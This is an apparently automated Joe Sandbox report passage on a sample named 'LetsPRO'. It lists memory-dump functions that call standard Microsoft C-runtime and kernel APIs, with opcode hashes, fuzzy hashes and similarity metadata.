                                        • API ID: _fileno$_errno_invalid_parameter_noinfo_lock_lock_file_lseek_write
                                        • String ID:
                                        • API String ID: 2790466172-0
                                        • Opcode ID: 9b93231c6630f1721ef13886ec7028b29b056bb3dd8e27dfbc5fc1b266beefa9
                                        • Instruction ID: 52faefd8319054e4c2c32196d9e179ce84ea91db03dda61624c37919d41f20c2
                                        • Opcode Fuzzy Hash: 9b93231c6630f1721ef13886ec7028b29b056bb3dd8e27dfbc5fc1b266beefa9
                                        • Instruction Fuzzy Hash: C2113472605E489FE7106F688CC25AD37A4AF63278724830ED0758BED1CB34D9064A51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90BE10 Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(6C90BE90,0000000C), ref: 6C90BEB6
                                        • _invalid_parameter_noinfo.MSVCR100(6C90BE90,0000000C), ref: 6C9294F7
                                          • Part of subcall function 6C90BC34: _lock.MSVCR100(00000001,6C90BC80,00000010,6C90BE52,6C90BE90,0000000C), ref: 6C90BC49
                                        • _errno.MSVCR100(6C90BE90,0000000C), ref: 6C929503
                                        • _errno.MSVCR100(6C90BE90,0000000C), ref: 6C929510
                                        • @_EH4_CallFilterFunc@8.LIBCMT(6C9A4610,?,000000FE,6C90BE90,0000000C), ref: 6C929526
                                          • Part of subcall function 6C90BD17: _wsopen_s.MSVCR100(?,?,00000000,?,00000180,00000000,?,?), ref: 6C90BDE1
                                          • Part of subcall function 6C90BEAC: _unlock_file.MSVCR100(?,6C90BE86), ref: 6C90BEAF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$CallFilterFunc@8_invalid_parameter_noinfo_lock_unlock_file_wsopen_s
                                        • String ID:
                                        • API String ID: 1609081514-0
                                        • Opcode ID: 89004f5a0dbd3738c01c7de52ec932f3f2fba3f81307a166fb876c6ab6107f05
                                        • Instruction ID: 9eb47f200bf030751cd9ab1f2617f0204a7a59444dca7df1c0199f9a5d47a990
                                        • Opcode Fuzzy Hash: 89004f5a0dbd3738c01c7de52ec932f3f2fba3f81307a166fb876c6ab6107f05
                                        • Instruction Fuzzy Hash: C7110670E00615DECB00AF788C809EF76B5AF65314B368E08D424DBB84DB39C9848B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90C89A Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6C93080D
                                        • GetCurrentProcessId.KERNEL32 ref: 6C930819
                                        • GetCurrentThreadId.KERNEL32 ref: 6C930821
                                        • GetTickCount.KERNEL32 ref: 6C930829
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C930835
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                        • String ID:
                                        • API String ID: 1445889803-0
                                        • Opcode ID: aec617caf98e8114478618cb8c92f310318e67457443a2b87ff10b9fccacb68d
                                        • Instruction ID: 14975ca31b9aecfc3a9896b82bc82ffea62470d6dbc14cceb40c819cade74776
                                        • Opcode Fuzzy Hash: aec617caf98e8114478618cb8c92f310318e67457443a2b87ff10b9fccacb68d
                                        • Instruction Fuzzy Hash: F411E972E002249BDF209BF9D848A4EB7F8EF49355F621965D824E7600DF70C980CBD0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C912ED8 Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT(?,6C912F28,00000010), ref: 6C912F0C
                                        • _lock_file.MSVCR100(?,?,6C912F28,00000010), ref: 6C912F17
                                          • Part of subcall function 6C90A4CD: _lock.MSVCR100(?,?,?,6C956EF0,00000040,6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C90A4FA
                                        • _fputwc_nolock.MSVCR100(?,?,?,?,?,?,?,?,6C912F28,00000010), ref: 6C912F5C
                                        • _errno.MSVCR100(6C912F28,00000010), ref: 6C928739
                                        • _invalid_parameter_noinfo.MSVCR100(6C912F28,00000010), ref: 6C928744
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_fputwc_nolock_invalid_parameter_noinfo_lock_lock_file_wcslen
                                        • String ID:
                                        • API String ID: 674470822-0
                                        • Opcode ID: e1e38320af8f38513a6b38f258e55025ed60278623e9e3740019cc72790c6da9
                                        • Instruction ID: 68dd83b4720f67a52d7021b84740e0b516dfafd1d504efe115f9dacd164b4484
                                        • Opcode Fuzzy Hash: e1e38320af8f38513a6b38f258e55025ed60278623e9e3740019cc72790c6da9
                                        • Instruction Fuzzy Hash: 1811E531A08659DBCF046F64C8055DD77B4FF22724F10C52AF8649AF90CB38CA609B94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94C757 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6C9276E1,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C94C3C2
                                        • free.MSVCR100(00000000,?,?,6C9276E1,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C94C3C5
                                        • DeleteCriticalSection.KERNEL32(00000002,?,?,6C9276E1,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C94C3EC
                                        • DecodePointer.KERNEL32(00000005,6C9276E1,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C94C768
                                        • TlsFree.KERNEL32(00000002,6C9276E1,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C94C786
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalDeleteSection$DecodeFreePointerfree
                                        • String ID:
                                        • API String ID: 1464103408-0
                                        • Opcode ID: 5d51f035f3a710786b8c5f63a7c239ac2238ea6464352c84353a5a8df360deb8
                                        • Instruction ID: 3402859e68619cacccbae5ecf61c50abe9036ad7ae8a34f2647c4242f1114e0a
                                        • Opcode Fuzzy Hash: 5d51f035f3a710786b8c5f63a7c239ac2238ea6464352c84353a5a8df360deb8
                                        • Instruction Fuzzy Hash: CD01D2326016009FDB206AACA88591D72FAAF52A393329319E4B4D3DA0CB21DC46DA50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C947981 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,6C94793E,00000000,?), ref: 6C94799E
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,6C94793E,00000000,?), ref: 6C9479B6
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,6C94793E,00000000,?), ref: 6C9479C4
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,6C94793E,00000000,?), ref: 6C9479D0
                                        • GetLastError.KERNEL32(?,6C94793E,00000000,?), ref: 6C9479DD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateEventExceptionThrow
                                        • String ID:
                                        • API String ID: 1718773336-0
                                        • Opcode ID: 71520b36f355b2f5866cfaf6b4e930c9344b631e4da7cc1abedae6ce203c4916
                                        • Instruction ID: 21f2168a9e8da99b2c90af295826572e7ee0574479f7ec3e199abd0d72286241
                                        • Opcode Fuzzy Hash: 71520b36f355b2f5866cfaf6b4e930c9344b631e4da7cc1abedae6ce203c4916
                                        • Instruction Fuzzy Hash: 4701D671600645AAC734EBA6DC48DAF3BBCFFD27583548D2DF416D2A00EB35E045C665
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C900D28 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo_wmemsetmemcpy
                                        • String ID:
                                        • API String ID: 286551074-0
                                        • Opcode ID: 4c47e15fd96f754e65bd220d429bcc62a976c3bac3cef8b486e782a40e3f284a
                                        • Instruction ID: eb7069d95d890de7058c865a05db4674568d6b66c43a8f46bcd4a8be5a25d909
                                        • Opcode Fuzzy Hash: 4c47e15fd96f754e65bd220d429bcc62a976c3bac3cef8b486e782a40e3f284a
                                        • Instruction Fuzzy Hash: 2501DF31651318EBCF329E04DC007EE3768EF05B68F11442AFD584AA94D775CA94DBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C900140 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo_memsetmemcpy
                                        • String ID:
                                        • API String ID: 2314827996-0
                                        • Opcode ID: 93e90c6a22b94a917288a195d90a0622ed6a6cfc10b69e2c5decfb7e63eb7a42
                                        • Instruction ID: 1b95d7111462c5f25bf80856acd94623b09d173903fb5df8453074bc4a3f61cc
                                        • Opcode Fuzzy Hash: 93e90c6a22b94a917288a195d90a0622ed6a6cfc10b69e2c5decfb7e63eb7a42
                                        • Instruction Fuzzy Hash: 0D01F231216318EFCF320E04DC04BDD3764AF05B68F11442AFC185AA91D77ACA94CBD2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C943BA1 Relevance: 7.5, APIs: 5, Instructions: 45COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • InterlockedFlushSList.KERNEL32(00000010,?,6C93FF6F), ref: 6C943BAB
                                        • InterlockedFlushSList.KERNEL32(00000018,?,6C93FF6F), ref: 6C943BB6
                                        • ??_V@YAXPAX@Z.MSVCR100(?,00000000,?,6C93FF6F), ref: 6C943BEF
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,00000000,?,6C93FF6F), ref: 6C943BF5
                                        • ??_V@YAXPAX@Z.MSVCR100(?,?,6C93FF6F), ref: 6C943C06
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: FlushInterlockedList$??3@
                                        • String ID:
                                        • API String ID: 964362523-0
                                        • Opcode ID: 45e123fc0c4d2d8f3153be9a95c2b6e1c07bdd8c22603c5e260b168eab7b84bb
                                        • Instruction ID: fb53c2ba85fd8c1c546ebabec8dfe345f732ee8ed653d72508810198cd10d25a
                                        • Opcode Fuzzy Hash: 45e123fc0c4d2d8f3153be9a95c2b6e1c07bdd8c22603c5e260b168eab7b84bb
                                        • Instruction Fuzzy Hash: AB0169362057419FD351EF74D8C0D6BB3A9BFB6318B21842DE16247E21CB31F849CA90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C940F57 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 6C940F88
                                        • GetLastError.KERNEL32 ref: 6C940F8F
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C940FA8
                                        • _CxxThrowException.MSVCR100(00000000,6C9A0D48,00000000), ref: 6C940FB7
                                        • CloseHandle.KERNEL32(?), ref: 6C940FBF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionHandleLastMultipleObjectsThrowWait
                                        • String ID:
                                        • API String ID: 1291167946-0
                                        • Opcode ID: 3f88cf4f133950d655fc0f3e177c6feeeb969bf51a7b2db9b502133b2e89da73
                                        • Instruction ID: 4f0f2660080e36b40c1bf4dae8675b615fac783397f3d58592de583dd3039cfb
                                        • Opcode Fuzzy Hash: 3f88cf4f133950d655fc0f3e177c6feeeb969bf51a7b2db9b502133b2e89da73
                                        • Instruction Fuzzy Hash: AD012B715042446BD7105A25CC40E5A77ACEFA1374F10C736F474C2AD0DB34E855D695
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C97E560 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(?,?,6C97C50B,00000000,?,00000000), ref: 6C97E56D
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C97C50B,00000000,?,00000000), ref: 6C97E577
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __get_sys_err_msg.LIBCMT ref: 6C97E58A
                                        • __cftoe.LIBCMT(00000000,?,?,00000000,000000FF,?,?,6C97C50B,00000000,?,00000000), ref: 6C97E598
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C97E5B3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __cftoe__get_sys_err_msg__invoke_watson_errno_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1727381857-0
                                        • Opcode ID: 26869b40d7f818274b5c90e262683fa130d4e9b567c3bb9c2d3b37b8e4061648
                                        • Instruction ID: c966709fc1a28a80d178a1e6c0624d596cedc94c9bf424b8e9911af7b22816cc
                                        • Opcode Fuzzy Hash: 26869b40d7f818274b5c90e262683fa130d4e9b567c3bb9c2d3b37b8e4061648
                                        • Instruction Fuzzy Hash: 66F0897554752CEFDF322E998C408DE362CAF25B28B204516F424C5E90FA31C69087F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C902A04 Relevance: 7.5, APIs: 5, Instructions: 43COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(?,6C9023BF,?,?,?,00000000,?), ref: 6C929408
                                        • _invalid_parameter_noinfo.MSVCR100(?,6C9023BF,?,?,?,00000000,?), ref: 6C929413
                                        • _errno.MSVCR100(?,?,6C9023BF,?,?,?,00000000,?), ref: 6C92941D
                                        • _errno.MSVCR100 ref: 6C929434
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C9023BF,?,?,?,00000000,?), ref: 6C92943F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2819658684-0
                                        • Opcode ID: 64d453ab774777d125229e37ca80b512f2348546d26f329b26ddc2f502b08f28
                                        • Instruction ID: 6eb79804db8f44d3f62c071a0c7e3b2b4f4c3f1816fc79b6f50e2250ef2be7e0
                                        • Opcode Fuzzy Hash: 64d453ab774777d125229e37ca80b512f2348546d26f329b26ddc2f502b08f28
                                        • Instruction Fuzzy Hash: F201F931A12619EBCF101F649C047DA3A68BF6133CF124659FC3846AE0CF79C050CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C912B67 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • _lock_file.MSVCR100(?,6C912BD0,0000000C), ref: 6C912B96
                                          • Part of subcall function 6C90A4CD: _lock.MSVCR100(?,?,?,6C956EF0,00000040,6C956F28,0000000C,6C9286C6,00000000,?), ref: 6C90A4FA
                                        • _fread_nolock_s.MSVCR100(?,?,?,?,?,6C912BD0,0000000C), ref: 6C912BAE
                                          • Part of subcall function 6C912A9A: memcpy_s.MSVCR100(?,?,?,?), ref: 6C912B43
                                          • Part of subcall function 6C9126F0: _unlock_file.MSVCR100(6C912BC5,6C912BC5), ref: 6C9126F3
                                        • _memset.LIBCMT(?,00000000,000000FF,?,?,6C912BD0,0000000C), ref: 6C928D52
                                        • _errno.MSVCR100(?,?,6C912BD0,0000000C), ref: 6C928D5A
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,6C912BD0,0000000C), ref: 6C928D65
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_fread_nolock_s_invalid_parameter_noinfo_lock_lock_file_memset_unlock_filememcpy_s
                                        • String ID:
                                        • API String ID: 3226975504-0
                                        • Opcode ID: 4c2332346bf10a52720509bf36dcafa5c8f31075ee3d6b95051d576fb6143bc2
                                        • Instruction ID: 3cfefb21fd6d8b9fe1b029063dd8a09e3ffb714b89c85dcb3e6cd95e71c74ff7
                                        • Opcode Fuzzy Hash: 4c2332346bf10a52720509bf36dcafa5c8f31075ee3d6b95051d576fb6143bc2
                                        • Instruction Fuzzy Hash: DC015E31805A1EEBDF11AF94C8099CE3F70AF26758F104526F83415AA1D735CA69DFD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C97EF60 Relevance: 7.5, APIs: 5, Instructions: 40stringCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(?,?,?,6C97DBA9,00000000,?,00000000), ref: 6C97EF6E
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,6C97DBA9,00000000,?,00000000), ref: 6C97EF78
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __get_sys_err_msg.LIBCMT ref: 6C97EF91
                                        • strncpy_s.MSVCR100(?,?,00000000,?,?,?,?,6C97DBA9,00000000,?,00000000), ref: 6C97EF9C
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C97EFAD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __get_sys_err_msg__invoke_watson_errno_invalid_parameter_invalid_parameter_noinfostrncpy_s
                                        • String ID:
                                        • API String ID: 161604870-0
                                        • Opcode ID: bddcaf0d0cb55db978c93973166e3f97a4275fe0d238cf78bab95a0254b5a0a8
                                        • Instruction ID: a65aa59af311ed5f4a0a81d2710243bb991b2221327d24494af0a82c07545569
                                        • Opcode Fuzzy Hash: bddcaf0d0cb55db978c93973166e3f97a4275fe0d238cf78bab95a0254b5a0a8
                                        • Instruction Fuzzy Hash: E4F0A732501118AFA7216F55CC048EE7B6CEFA16A8B100025FD2C86E10EB32D95596F0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90C405 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _control87.MSVCR100(00000001,?,00000000,?,6C94CD83,00000000,00010000,00030000,?,6C931DBE,?,6C90C484,?,?,6C90B961,00000000), ref: 6C90C433
                                        • _control87.MSVCR100(00000000,00000000,00000000,?,6C94CD83,00000000,00010000,00030000,?,6C931DBE,?,6C90C484,?,?,6C90B961,00000000), ref: 6C932523
                                        • _errno.MSVCR100(00000000,?,6C94CD83,00000000,00010000,00030000,?,6C931DBE,?,6C90C484,?,?,6C90B961,00000000), ref: 6C93252C
                                        • _invalid_parameter_noinfo.MSVCR100(00000000,?,6C94CD83,00000000,00010000,00030000,?,6C931DBE,?,6C90C484,?,?,6C90B961,00000000), ref: 6C932536
                                        • _control87.MSVCR100(00000001,?,00000000,?,6C94CD83,00000000,00010000,00030000,?,6C931DBE,?,6C90C484,?,?,6C90B961,00000000), ref: 6C932542
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _control87$_errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1498936549-0
                                        • Opcode ID: be07e889d2b5ed1670540ae892ce49ea797300f69d60ed3802b921b155d01b2f
                                        • Instruction ID: 67a0a4f4162bea9b970338252431c090d37230e78b2e0b37a20cc5d53a540c06
                                        • Opcode Fuzzy Hash: be07e889d2b5ed1670540ae892ce49ea797300f69d60ed3802b921b155d01b2f
                                        • Instruction Fuzzy Hash: 0DF0B4327487649BD7252EB89801BDA73D8EF24B24F14051DF9589FB81DB71D90086F9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

